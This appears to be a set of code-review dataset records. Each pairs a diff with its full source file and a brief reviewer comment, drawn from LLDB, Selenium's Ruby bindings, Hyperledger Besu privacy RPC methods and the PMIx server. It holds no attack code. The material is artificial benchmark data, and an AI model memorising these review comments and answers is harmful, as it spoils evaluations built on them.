// We have a variable that wasn't tied to a frame, which means it is a global
// and is always in scope.
return true;
}
lldb::ModuleSP ValueObjectVariable::GetModule() {
if (m_variable_sp) {
SymbolContextScope *sc_scope = m_variable_sp->GetSymbolContextScope();
if (sc_scope) {
return sc_scope->CalculateSymbolContextModule();
}
}
return lldb::ModuleSP();
}
SymbolContextScope *ValueObjectVariable::GetSymbolContextScope() {
if (m_variable_sp)
return m_variable_sp->GetSymbolContextScope();
return NULL;
}
bool ValueObjectVariable::GetDeclaration(Declaration &decl) {
if (m_variable_sp) {
decl = m_variable_sp->GetDeclaration();
return true;
}
return false;
}
const char *ValueObjectVariable::GetLocationAsCString() {
if (m_resolved_value.GetContextType() == Value::eContextTypeRegisterInfo)
return GetLocationAsCStringImpl(m_resolved_value, m_data);
else
return ValueObject::GetLocationAsCString();
}
bool ValueObjectVariable::SetValueFromCString(const char *value_str,
Status &error) {
if (!UpdateValueIfNeeded()) {
error.SetErrorString("unable to update value before writing");
return false;
}
if (m_resolved_value.GetContextType() == Value::eContextTypeRegisterInfo) {
RegisterInfo *reg_info = m_resolved_value.GetRegisterInfo();
ExecutionContext exe_ctx(GetExecutionContextRef());
RegisterContext *reg_ctx = exe_ctx.GetRegisterContext();
RegisterValue reg_value;
if (!reg_info || !reg_ctx) {
error.SetErrorString("unable to retrieve register info");
return false;
}
error = reg_value.SetValueFromString(reg_info, llvm::StringRef(value_str));
if (error.Fail())
return false;
if (reg_ctx->WriteRegister(reg_info, reg_value)) {
SetNeedsUpdate();
return true;
} else {
error.SetErrorString("unable to write back to register");
return false;
}
} else
return ValueObject::SetValueFromCString(value_str, error);
}
bool ValueObjectVariable::SetData(DataExtractor &data, Status &error) {
if (!UpdateValueIfNeeded()) {
error.SetErrorString("unable to update value before writing");
return false;
}
if (m_resolved_value.GetContextType() == Value::eContextTypeRegisterInfo) {
RegisterInfo *reg_info = m_resolved_value.GetRegisterInfo();
ExecutionContext exe_ctx(GetExecutionContextRef());
RegisterContext *reg_ctx = exe_ctx.GetRegisterContext();
RegisterValue reg_value;
if (!reg_info || !reg_ctx) {
error.SetErrorString("unable to retrieve register info");
return false;
}
error = reg_value.SetValueFromData(reg_info, data, 0, true);
if (error.Fail())
return false;
if (reg_ctx->WriteRegister(reg_info, reg_value)) {
SetNeedsUpdate();
return true;
} else {
error.SetErrorString("unable to write back to register");
return false;
}
} else
return ValueObject::SetData(data, error);
}
| 1 | 19,300 | Because of this new early exit. | apple-swift-lldb | cpp |
@@ -57,8 +57,10 @@ module Selenium
#
# @return [Driver]
#
- # @see Selenium::WebDriver::Remote::Bridge
+ # @see Selenium::WebDriver::Remote::OSSBridge
+ # @see Selenium::WebDriver::Remote::W3CBridge
# @see Selenium::WebDriver::Firefox::Bridge
+ # @see Selenium::WebDriver::Firefox::W3CBridge
# @see Selenium::WebDriver::IE::Bridge
# @see Selenium::WebDriver::Edge::Bridge
# @see Selenium::WebDriver::Chrome::Bridge | 1 | # encoding: utf-8
#
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require 'childprocess'
require 'tmpdir'
require 'fileutils'
require 'date'
require 'json'
require 'selenium/webdriver/common'
require 'selenium/webdriver/atoms'
module Selenium
module WebDriver
Point = Struct.new(:x, :y)
Dimension = Struct.new(:width, :height)
Location = Struct.new(:latitude, :longitude, :altitude)
autoload :Chrome, 'selenium/webdriver/chrome'
autoload :Edge, 'selenium/webdriver/edge'
autoload :Firefox, 'selenium/webdriver/firefox'
autoload :IE, 'selenium/webdriver/ie'
autoload :PhantomJS, 'selenium/webdriver/phantomjs'
autoload :Remote, 'selenium/webdriver/remote'
autoload :Safari, 'selenium/webdriver/safari'
autoload :Support, 'selenium/webdriver/support'
# @api private
def self.root
@root ||= File.expand_path('../..', __FILE__)
end
#
# Create a new Driver instance with the correct bridge for the given browser
#
# @param browser [:ie, :internet_explorer, :edge, :remote, :chrome, :firefox, :ff, :phantomjs, :safari]
# the driver type to use
# @param *rest
# arguments passed to Bridge.new
#
# @return [Driver]
#
# @see Selenium::WebDriver::Remote::Bridge
# @see Selenium::WebDriver::Firefox::Bridge
# @see Selenium::WebDriver::IE::Bridge
# @see Selenium::WebDriver::Edge::Bridge
# @see Selenium::WebDriver::Chrome::Bridge
# @see Selenium::WebDriver::PhantomJS::Bridge
# @see Selenium::WebDriver::Safari::Bridge
#
# @example
#
# WebDriver.for :firefox, :profile => "some-profile"
# WebDriver.for :firefox, :profile => Profile.new
# WebDriver.for :remote, :url => "http://localhost:4444/wd/hub", :desired_capabilities => caps
#
# One special argument is not passed on to the bridges, :listener.
# You can pass a listener for this option to get notified of WebDriver events.
# The passed object must respond to #call or implement the methods from AbstractEventListener.
#
# @see Selenium::WebDriver::Support::AbstractEventListener
#
def self.for(*args)
WebDriver::Driver.for(*args)
end
end # WebDriver
end # Selenium
| 1 | 14,227 | Maybe call it `WireBridge`? | SeleniumHQ-selenium | rb |
@@ -150,12 +150,16 @@ public abstract class PrivacyApiGroupJsonRpcMethods extends ApiGroupJsonRpcMetho
private JsonRpcMethod createPrivacyMethod(
final PrivacyParameters privacyParameters, final JsonRpcMethod rpcMethod) {
- if (rpcMethod.getName().equals(RpcMethod.ETH_SEND_RAW_PRIVATE_TRANSACTION.getMethodName())) {
+ final String methodName = rpcMethod.getName();
+ if (methodName.equals(RpcMethod.ETH_SEND_RAW_PRIVATE_TRANSACTION.getMethodName())) {
+ return rpcMethod;
+ } else if (methodName.equals(RpcMethod.PRIV_DISTRIBUTE_RAW_TRANSACTION.getMethodName())
+ && privacyParameters.getGoQuorumPrivacyParameters().isPresent()) {
return rpcMethod;
} else if (privacyParameters.isEnabled() && privacyParameters.isMultiTenancyEnabled()) {
return new MultiTenancyRpcMethodDecorator(rpcMethod);
} else if (!privacyParameters.isEnabled()) {
- return new DisabledPrivacyRpcMethod(rpcMethod.getName());
+ return new DisabledPrivacyRpcMethod(methodName);
} else {
return rpcMethod;
} | 1 | /*
* Copyright ConsenSys AG.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*
* SPDX-License-Identifier: Apache-2.0
*/
package org.hyperledger.besu.ethereum.api.jsonrpc.methods;
import org.hyperledger.besu.ethereum.api.jsonrpc.LatestNonceProvider;
import org.hyperledger.besu.ethereum.api.jsonrpc.RpcMethod;
import org.hyperledger.besu.ethereum.api.jsonrpc.internal.methods.JsonRpcMethod;
import org.hyperledger.besu.ethereum.api.jsonrpc.internal.privacy.methods.DisabledPrivacyRpcMethod;
import org.hyperledger.besu.ethereum.api.jsonrpc.internal.privacy.methods.EnclavePublicKeyProvider;
import org.hyperledger.besu.ethereum.api.jsonrpc.internal.privacy.methods.MultiTenancyRpcMethodDecorator;
import org.hyperledger.besu.ethereum.api.query.BlockchainQueries;
import org.hyperledger.besu.ethereum.api.query.PrivacyQueries;
import org.hyperledger.besu.ethereum.core.Address;
import org.hyperledger.besu.ethereum.core.PrivacyParameters;
import org.hyperledger.besu.ethereum.eth.transactions.PendingTransactions;
import org.hyperledger.besu.ethereum.eth.transactions.TransactionPool;
import org.hyperledger.besu.ethereum.mainnet.ProtocolSchedule;
import org.hyperledger.besu.ethereum.privacy.ChainHeadPrivateNonceProvider;
import org.hyperledger.besu.ethereum.privacy.DefaultPrivacyController;
import org.hyperledger.besu.ethereum.privacy.MultiTenancyPrivacyController;
import org.hyperledger.besu.ethereum.privacy.PrivacyController;
import org.hyperledger.besu.ethereum.privacy.PrivateNonceProvider;
import org.hyperledger.besu.ethereum.privacy.PrivateTransactionSimulator;
import org.hyperledger.besu.ethereum.privacy.markertransaction.FixedKeySigningPrivateMarkerTransactionFactory;
import org.hyperledger.besu.ethereum.privacy.markertransaction.PrivateMarkerTransactionFactory;
import org.hyperledger.besu.ethereum.privacy.markertransaction.RandomSigningPrivateMarkerTransactionFactory;
import java.math.BigInteger;
import java.util.Map;
import java.util.Optional;
import java.util.stream.Collectors;
public abstract class PrivacyApiGroupJsonRpcMethods extends ApiGroupJsonRpcMethods {
private final BlockchainQueries blockchainQueries;
private final ProtocolSchedule protocolSchedule;
private final TransactionPool transactionPool;
private final PrivacyParameters privacyParameters;
private final PrivateNonceProvider privateNonceProvider;
private final PrivacyQueries privacyQueries;
protected PrivacyApiGroupJsonRpcMethods(
final BlockchainQueries blockchainQueries,
final ProtocolSchedule protocolSchedule,
final TransactionPool transactionPool,
final PrivacyParameters privacyParameters) {
this.blockchainQueries = blockchainQueries;
this.protocolSchedule = protocolSchedule;
this.transactionPool = transactionPool;
this.privacyParameters = privacyParameters;
this.privateNonceProvider =
new ChainHeadPrivateNonceProvider(
blockchainQueries.getBlockchain(),
privacyParameters.getPrivateStateRootResolver(),
privacyParameters.getPrivateWorldStateArchive());
this.privacyQueries =
new PrivacyQueries(blockchainQueries, privacyParameters.getPrivateWorldStateReader());
}
public BlockchainQueries getBlockchainQueries() {
return blockchainQueries;
}
public ProtocolSchedule getProtocolSchedule() {
return protocolSchedule;
}
public TransactionPool getTransactionPool() {
return transactionPool;
}
public PrivacyParameters getPrivacyParameters() {
return privacyParameters;
}
@Override
protected Map<String, JsonRpcMethod> create() {
final PrivateMarkerTransactionFactory markerTransactionFactory =
createPrivateMarkerTransactionFactory(
privacyParameters, blockchainQueries, transactionPool.getPendingTransactions());
final EnclavePublicKeyProvider enclavePublicProvider =
EnclavePublicKeyProvider.build(privacyParameters);
final PrivacyController privacyController = createPrivacyController(markerTransactionFactory);
return create(privacyController, enclavePublicProvider).entrySet().stream()
.collect(
Collectors.toMap(
Map.Entry::getKey,
entry -> createPrivacyMethod(privacyParameters, entry.getValue())));
}
protected abstract Map<String, JsonRpcMethod> create(
final PrivacyController privacyController,
final EnclavePublicKeyProvider enclavePublicKeyProvider);
private PrivateMarkerTransactionFactory createPrivateMarkerTransactionFactory(
final PrivacyParameters privacyParameters,
final BlockchainQueries blockchainQueries,
final PendingTransactions pendingTransactions) {
final Address privateContractAddress =
Address.privacyPrecompiled(privacyParameters.getPrivacyAddress());
if (privacyParameters.getSigningKeyPair().isPresent()) {
return new FixedKeySigningPrivateMarkerTransactionFactory(
privateContractAddress,
new LatestNonceProvider(blockchainQueries, pendingTransactions),
privacyParameters.getSigningKeyPair().get());
}
return new RandomSigningPrivateMarkerTransactionFactory(privateContractAddress);
}
private PrivacyController createPrivacyController(
final PrivateMarkerTransactionFactory markerTransactionFactory) {
final Optional<BigInteger> chainId = protocolSchedule.getChainId();
final DefaultPrivacyController defaultPrivacyController =
new DefaultPrivacyController(
getBlockchainQueries().getBlockchain(),
privacyParameters,
chainId,
markerTransactionFactory,
createPrivateTransactionSimulator(),
privateNonceProvider,
privacyParameters.getPrivateWorldStateReader());
return privacyParameters.isMultiTenancyEnabled()
? new MultiTenancyPrivacyController(
defaultPrivacyController,
chainId,
privacyParameters.getEnclave(),
privacyParameters.isOnchainPrivacyGroupsEnabled())
: defaultPrivacyController;
}
PrivacyQueries getPrivacyQueries() {
return privacyQueries;
}
private JsonRpcMethod createPrivacyMethod(
final PrivacyParameters privacyParameters, final JsonRpcMethod rpcMethod) {
if (rpcMethod.getName().equals(RpcMethod.ETH_SEND_RAW_PRIVATE_TRANSACTION.getMethodName())) {
return rpcMethod;
} else if (privacyParameters.isEnabled() && privacyParameters.isMultiTenancyEnabled()) {
return new MultiTenancyRpcMethodDecorator(rpcMethod);
} else if (!privacyParameters.isEnabled()) {
return new DisabledPrivacyRpcMethod(rpcMethod.getName());
} else {
return rpcMethod;
}
}
private PrivateTransactionSimulator createPrivateTransactionSimulator() {
return new PrivateTransactionSimulator(
getBlockchainQueries().getBlockchain(),
getBlockchainQueries().getWorldStateArchive(),
getProtocolSchedule(),
getPrivacyParameters());
}
}
| 1 | 24,434 | can this be removed now? | hyperledger-besu | java |
@@ -213,8 +213,11 @@ static pmix_status_t initialize_server_base(pmix_server_module_t *module)
}
/* for now, just setup the v1.1 series rendezvous point
- * we use the pid to reduce collisions */
- if (0 > asprintf(&pmix_pid, "%s/pmix-%d", tdir, mypid)) {
+     * - use the userid to avoid the situation where a user with a different
+     *   UID but the same PID created the usock and terminated abnormally,
+     *   leaving us no way to remove the file
+ * - use the pid to reduce collisions */
+ if (0 > asprintf(&pmix_pid, "%s/pmix-%d.%d", tdir, getuid(), mypid)) {
return PMIX_ERR_NOMEM;
}
| 1 | /* -*- Mode: C; c-basic-offset:4 ; indent-tabs-mode:nil -*- */
/*
* Copyright (c) 2014-2016 Intel, Inc. All rights reserved.
* Copyright (c) 2014-2016 Research Organization for Information Science
* and Technology (RIST). All rights reserved.
* Copyright (c) 2014-2015 Artem Y. Polyakov <[email protected]>.
* All rights reserved.
* Copyright (c) 2016 Mellanox Technologies, Inc.
* All rights reserved.
* Copyright (c) 2016 IBM Corporation. All rights reserved.
* $COPYRIGHT$
*
* Additional copyrights may follow
*
* $HEADER$
*/
#include <src/include/pmix_config.h>
#include <src/include/types.h>
#include <src/include/pmix_stdint.h>
#include <src/include/pmix_socket_errno.h>
#include <pmix_server.h>
#include <pmix_common.h>
#include "src/include/pmix_globals.h"
#ifdef HAVE_STRING_H
#include <string.h>
#endif
#include <fcntl.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef HAVE_SYS_SOCKET_H
#include <sys/socket.h>
#endif
#ifdef HAVE_SYS_UN_H
#include <sys/un.h>
#endif
#ifdef HAVE_SYS_UIO_H
#include <sys/uio.h>
#endif
#ifdef HAVE_SYS_TYPES_H
#include <sys/types.h>
#endif
#include <ctype.h>
#include <sys/stat.h>
#include PMIX_EVENT_HEADER
#include PMIX_EVENT2_THREAD_HEADER
#include "src/util/argv.h"
#include "src/util/error.h"
#include "src/util/output.h"
#include "src/util/pmix_environ.h"
#include "src/util/show_help.h"
#include "src/mca/base/base.h"
#include "src/mca/base/pmix_mca_base_var.h"
#include "src/mca/pinstalldirs/base/base.h"
#include "src/runtime/pmix_progress_threads.h"
#include "src/usock/usock.h"
#include "src/sec/pmix_sec.h"
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
#include "src/dstore/pmix_dstore.h"
#endif /* PMIX_ENABLE_DSTORE */
#include "pmix_server_ops.h"
// global variables
pmix_server_globals_t pmix_server_globals = {{{0}}};
// local variables
static char *security_mode = NULL;
static pid_t mypid;
static char *mytmpdir = NULL;
static char *systmpdir = NULL;
// local functions for connection support
static void server_message_handler(struct pmix_peer_t *pr, pmix_usock_hdr_t *hdr,
pmix_buffer_t *buf, void *cbdata);
static inline int _my_client(const char *nspace, pmix_rank_t rank);
/* queue a message to be sent to one of our procs - must
* provide the following params:
*
* p - the peer object of the process
* t - tag to be sent to
* b - buffer to be sent
*/
void pmix_server_queue_message(int fd, short args, void *cbdata)
{
pmix_usock_queue_t *queue = (pmix_usock_queue_t*)cbdata;
pmix_usock_send_t *snd;
pmix_output_verbose(2, pmix_globals.debug_output,
"[%s:%d] queue callback called: reply to %s:%d on tag %d",
__FILE__, __LINE__,
(queue->peer)->info->nptr->nspace,
(queue->peer)->info->rank, (queue->tag));
snd = PMIX_NEW(pmix_usock_send_t);
snd->hdr.pindex = pmix_globals.pindex;
snd->hdr.tag = (queue->tag);
snd->hdr.nbytes = (queue->buf)->bytes_used;
snd->data = (queue->buf);
/* always start with the header */
snd->sdptr = (char*)&snd->hdr;
snd->sdbytes = sizeof(pmix_usock_hdr_t);
/* if there is no message on-deck, put this one there */
if (NULL == (queue->peer)->send_msg) {
(queue->peer)->send_msg = snd;
} else {
/* add it to the queue */
pmix_list_append(&(queue->peer)->send_queue, &snd->super);
}
/* ensure the send event is active */
if (!(queue->peer)->send_ev_active) {
event_add(&(queue->peer)->send_event, 0);
(queue->peer)->send_ev_active = true;
}
PMIX_RELEASE(queue);
}
static pmix_status_t initialize_server_base(pmix_server_module_t *module)
{
int debug_level;
char *tdir, *evar;
char * pmix_pid;
pmix_listener_t *listener;
pmix_status_t ret;
/* initialize the output system */
if (!pmix_output_init()) {
fprintf(stderr, "PMIx server was unable to initialize its output system\n");
return PMIX_ERR_INIT;
}
/* initialize install dirs code */
if (PMIX_SUCCESS != (ret = pmix_mca_base_framework_open(&pmix_pinstalldirs_base_framework, 0))) {
fprintf(stderr, "pmix_pinstalldirs_base_open() failed -- process will likely abort (%s:%d, returned %d instead of PMIX_SUCCESS)\n",
__FILE__, __LINE__, ret);
return ret;
}
if (PMIX_SUCCESS != pmix_show_help_init()) {
fprintf(stderr, "PMIx server was unable to initialize its show_help system\n");
return PMIX_ERR_INIT;
}
/* setup the globals */
pmix_globals_init();
memset(&pmix_server_globals, 0, sizeof(pmix_server_globals));
/* mark that I am a server */
pmix_globals.server = true;
/* look for our namespace, if one was given */
if (NULL == (evar = getenv("PMIX_SERVER_NAMESPACE"))) {
/* use a fake namespace */
(void)strncpy(pmix_globals.myid.nspace, "pmix-server", PMIX_MAX_NSLEN);
} else {
(void)strncpy(pmix_globals.myid.nspace, evar, PMIX_MAX_NSLEN);
}
/* look for our rank, if one was given */
mypid = getpid();
if (NULL == (evar = getenv("PMIX_SERVER_RANK"))) {
/* use our pid */
pmix_globals.myid.rank = mypid;
} else {
pmix_globals.myid.rank = strtol(evar, NULL, 10);
}
/* initialize the datatype support */
pmix_bfrop_open();
/* setup the server-specific globals */
PMIX_CONSTRUCT(&pmix_server_globals.clients, pmix_pointer_array_t);
pmix_pointer_array_init(&pmix_server_globals.clients, 1, INT_MAX, 1);
PMIX_CONSTRUCT(&pmix_server_globals.collectives, pmix_list_t);
PMIX_CONSTRUCT(&pmix_server_globals.remote_pnd, pmix_list_t);
PMIX_CONSTRUCT(&pmix_server_globals.gdata, pmix_buffer_t);
PMIX_CONSTRUCT(&pmix_server_globals.events, pmix_list_t);
PMIX_CONSTRUCT(&pmix_server_globals.local_reqs, pmix_list_t);
PMIX_CONSTRUCT(&pmix_server_globals.notifications, pmix_ring_buffer_t);
PMIX_CONSTRUCT(&pmix_server_globals.listeners, pmix_list_t);
pmix_ring_buffer_init(&pmix_server_globals.notifications, 256);
/* see if debug is requested */
if (NULL != (evar = getenv("PMIX_DEBUG"))) {
debug_level = strtol(evar, NULL, 10);
pmix_globals.debug_output = pmix_output_open(NULL);
pmix_output_set_verbosity(pmix_globals.debug_output, debug_level);
}
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server init called");
/* setup the function pointers */
memset(&pmix_host_server, 0, sizeof(pmix_server_module_t));
pmix_host_server = *module;
/* init security */
pmix_sec_init();
security_mode = strdup(pmix_sec.name);
/* find the temp dir */
if (NULL != mytmpdir) {
tdir = mytmpdir;
} else if (NULL == (tdir = getenv("TMPDIR"))) {
if (NULL == (tdir = getenv("TEMP"))) {
if (NULL == (tdir = getenv("TMP"))) {
tdir = "/tmp";
}
}
}
/* for now, just setup the v1.1 series rendezvous point
* we use the pid to reduce collisions */
if (0 > asprintf(&pmix_pid, "%s/pmix-%d", tdir, mypid)) {
return PMIX_ERR_NOMEM;
}
if ((strlen(pmix_pid) + 1) > sizeof(listener->address.sun_path)-1) {
pmix_show_help("help-pmix-server.txt", "rnd-path-too-long", true, tdir, pmix_pid);
free(pmix_pid);
return PMIX_ERR_INVALID_LENGTH;
}
listener = PMIX_NEW(pmix_listener_t);
snprintf(listener->address.sun_path, sizeof(listener->address.sun_path)-1, "%s", pmix_pid);
if (0 > asprintf(&listener->uri, "%s:%lu:%s", pmix_globals.myid.nspace,
(unsigned long)pmix_globals.myid.rank, listener->address.sun_path)) {
free(pmix_pid);
return PMIX_ERR_NOMEM;
}
listener->varname = strdup("PMIX_SERVER_URI");
listener->protocol = PMIX_PROTOCOL_V1;
pmix_list_append(&pmix_server_globals.listeners, &listener->super);
free(pmix_pid);
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server constructed uri %s", listener->uri);
return PMIX_SUCCESS;
}
PMIX_EXPORT pmix_status_t PMIx_server_init(pmix_server_module_t *module,
pmix_info_t info[], size_t ninfo)
{
pmix_usock_posted_recv_t *req;
pmix_status_t rc;
size_t n, m;
pmix_kval_t kv;
pmix_listener_t *lt;
bool need_listener;
int myhostnamelen = 30;
char myhostname[myhostnamelen];
char *pmix_pid, *tdir;
char **protected = NULL;
bool protect;
bool tool_support = false;
bool system_tool = false;
bool session_tool = false;
pmix_listener_t *tl;
if (0 < pmix_globals.init_cntr) {
return PMIX_SUCCESS;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server init called");
/* Check for the info keys that are not independent from
* initialize_server_base() and even may be needed there */
if (NULL != info) {
for (n=0; n < ninfo; n++) {
if (0 == strcmp(info[n].key, PMIX_SERVER_TMPDIR) &&
NULL == mytmpdir) {
mytmpdir = strdup(info[n].value.data.string);
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_SERVER_TMPDIR);
} else if (0 == strcmp(info[n].key, PMIX_SYSTEM_TMPDIR) &&
NULL == systmpdir) {
systmpdir = strdup(info[n].value.data.string);
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_SYSTEM_TMPDIR);
}
}
}
if (0 != (rc = initialize_server_base(module))) {
return rc;
}
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
if (PMIX_SUCCESS != (rc = pmix_dstore_init(info, ninfo))) {
return rc;
}
#endif /* PMIX_ENABLE_DSTORE */
/* and the usock system */
pmix_usock_init(NULL);
/* tell the event library we need thread support */
pmix_event_use_threads();
/* create an event base and progress thread for us */
if (NULL == (pmix_globals.evbase = pmix_progress_thread_init(NULL))) {
return PMIX_ERR_INIT;
}
/* check the info keys for a directive about the uid/gid
* to be set for the rendezvous file */
if (NULL != info) {
for (n=0; n < ninfo; n++) {
if (0 == strcmp(info[n].key, PMIX_USERID)) {
/* the userid is in the uint32_t storage */
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
lt->owner = info[n].value.data.uint32;
lt->owner_given = true;
}
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_USERID);
} else if (0 == strcmp(info[n].key, PMIX_GRPID)) {
/* the grpid is in the uint32_t storage */
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
lt->group = info[n].value.data.uint32;
lt->group_given = true;
}
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_GRPID);
} else if (0 == strcmp(info[n].key, PMIX_SOCKET_MODE)) {
/* socket mode is in the uint32_t storage */
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
lt->mode = info[n].value.data.uint32;
}
} else if (0 == strcmp(info[n].key, PMIX_SERVER_TOOL_SUPPORT)) {
/* defer processing to ensure we pickup any tmpdir
* directives before setting location */
session_tool = true;
tool_support = true;
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_SERVER_TOOL_SUPPORT);
} else if (0 == strcmp(info[n].key, PMIX_SERVER_SYSTEM_SUPPORT)) {
/* we are also the system tool server */
system_tool = true;
tool_support = true;
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_SERVER_TOOL_SUPPORT);
}
}
}
if (tool_support) {
/* Get up to 30 chars of hostname.*/
gethostname(myhostname, myhostnamelen);
/* ensure it is NULL terminated */
myhostname[myhostnamelen-1] = '\0';
/* if we are to be the system tool, then we look for
* the system tmpdir and do not include a pid in
* the rendezvous point */
if (system_tool) {
if (NULL != systmpdir) {
tdir = systmpdir;
} else if (NULL == (tdir = getenv("TMPDIR"))) {
if (NULL == (tdir = getenv("TEMP"))) {
if (NULL == (tdir = getenv("TMP"))) {
tdir = "/tmp";
}
}
}
if (0 > asprintf(&pmix_pid, "%s/pmix.sys.%s", tdir, myhostname)) {
return PMIX_ERR_NOMEM;
}
if ((strlen(pmix_pid) + 1) > sizeof(tl->address.sun_path)-1) {
pmix_show_help("help-pmix-server.txt", "rnd-path-too-long", true, tdir, pmix_pid);
free(pmix_pid);
return PMIX_ERR_INVALID_LENGTH;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"%s:%d dropping system tool at %s",
pmix_globals.myid.nspace,
pmix_globals.myid.rank, pmix_pid);
/* create the listener for this point */
tl = PMIX_NEW(pmix_listener_t);
            tl->address.sun_family = AF_UNIX;
tl->protocol = PMIX_PROTOCOL_TOOL;
snprintf(tl->address.sun_path, sizeof(tl->address.sun_path) - 1, "%s", pmix_pid);
free(pmix_pid);
pmix_list_append(&pmix_server_globals.listeners, &tl->super);
}
/* if we are a session tool, then we use the session tmpdir
* and append our pid */
if (session_tool) {
if (NULL != mytmpdir) {
tdir = mytmpdir;
} else if (NULL == (tdir = getenv("TMPDIR"))) {
if (NULL == (tdir = getenv("TEMP"))) {
if (NULL == (tdir = getenv("TMP"))) {
tdir = "/tmp";
}
}
}
/* mark this with my pid */
if (0 > asprintf(&pmix_pid, "%s/pmix.%s.tool.%d", tdir, myhostname, mypid)) {
return PMIX_ERR_NOMEM;
}
if ((strlen(pmix_pid) + 1) > sizeof(tl->address.sun_path)-1) {
pmix_show_help("help-pmix-server.txt", "rnd-path-too-long", true, tdir, pmix_pid);
free(pmix_pid);
return PMIX_ERR_INVALID_LENGTH;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"%s:%d dropping session tool at %s",
pmix_globals.myid.nspace,
pmix_globals.myid.rank, pmix_pid);
/* create the listener for this point */
tl = PMIX_NEW(pmix_listener_t);
            tl->address.sun_family = AF_UNIX;
tl->protocol = PMIX_PROTOCOL_TOOL;
snprintf(tl->address.sun_path, sizeof(tl->address.sun_path) - 1, "%s", pmix_pid);
free(pmix_pid);
pmix_list_append(&pmix_server_globals.listeners, &tl->super);
}
/* we don't provide a URI for this listener as we don't pass
* the TOOL connection URI to a child process */
pmix_server_globals.tool_connections_allowed = true;
}
/* setup the wildcard recv for inbound messages from clients */
req = PMIX_NEW(pmix_usock_posted_recv_t);
req->tag = UINT32_MAX;
req->cbfunc = server_message_handler;
/* add it to the end of the list of recvs */
pmix_list_append(&pmix_usock_globals.posted_recvs, &req->super);
/* start listening */
need_listener = false;
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
if (PMIX_SUCCESS != pmix_prepare_listening(lt, &need_listener)) {
PMIx_server_finalize();
return PMIX_ERR_INIT;
}
}
if (need_listener) {
if (PMIX_SUCCESS != pmix_start_listening()) {
pmix_show_help("help-pmix-server.txt", "listener-failed-start", true, tl->address.sun_path);
PMIx_server_finalize();
return PMIX_ERR_INIT;
}
}
/* check the info keys for info we
* need to provide to every client */
if (NULL != info) {
PMIX_CONSTRUCT(&kv, pmix_kval_t);
for (n=0; n < ninfo; n++) {
/* check the list of protected keys */
protect = false;
if (NULL != protected) {
for (m=0; NULL != protected[m]; m++) {
if (0 == strcmp(info[n].key, protected[m])) {
protect = true;
break;
}
}
}
if (protect) {
continue;
}
/* store and pass along to every client */
kv.key = info[n].key;
kv.value = &info[n].value;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&pmix_server_globals.gdata, &kv, 1, PMIX_KVAL))) {
PMIX_ERROR_LOG(rc);
pmix_show_help("help-pmix-server.txt", "data-store-failed", true, kv.key);
/* protect the incoming data */
kv.key = NULL;
kv.value = NULL;
PMIX_DESTRUCT(&kv);
PMIx_server_finalize();
return rc;
}
}
/* protect the incoming data */
kv.key = NULL;
kv.value = NULL;
PMIX_DESTRUCT(&kv);
}
++pmix_globals.init_cntr;
return PMIX_SUCCESS;
}
static void cleanup_server_state(void)
{
int i;
pmix_peer_t *peer;
for (i=0; i < pmix_server_globals.clients.size; i++) {
if (NULL != (peer = (pmix_peer_t*)pmix_pointer_array_get_item(&pmix_server_globals.clients, i))) {
PMIX_RELEASE(peer);
}
}
PMIX_DESTRUCT(&pmix_server_globals.clients);
PMIX_LIST_DESTRUCT(&pmix_server_globals.collectives);
PMIX_LIST_DESTRUCT(&pmix_server_globals.remote_pnd);
PMIX_LIST_DESTRUCT(&pmix_server_globals.local_reqs);
PMIX_DESTRUCT(&pmix_server_globals.gdata);
PMIX_LIST_DESTRUCT(&pmix_server_globals.listeners);
if (NULL != security_mode) {
free(security_mode);
}
if (NULL != mytmpdir) {
free(mytmpdir);
}
if (NULL != systmpdir) {
free(systmpdir);
}
pmix_bfrop_close();
pmix_sec_finalize();
pmix_globals_finalize();
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server finalize complete");
pmix_output_close(pmix_globals.debug_output);
pmix_output_finalize();
pmix_class_finalize();
}
PMIX_EXPORT pmix_status_t PMIx_server_finalize(void)
{
if (1 != pmix_globals.init_cntr) {
--pmix_globals.init_cntr;
return PMIX_SUCCESS;
}
pmix_globals.init_cntr = 0;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server finalize called");
if (pmix_server_globals.listen_thread_active) {
pmix_stop_listening();
}
pmix_progress_thread_finalize(NULL);
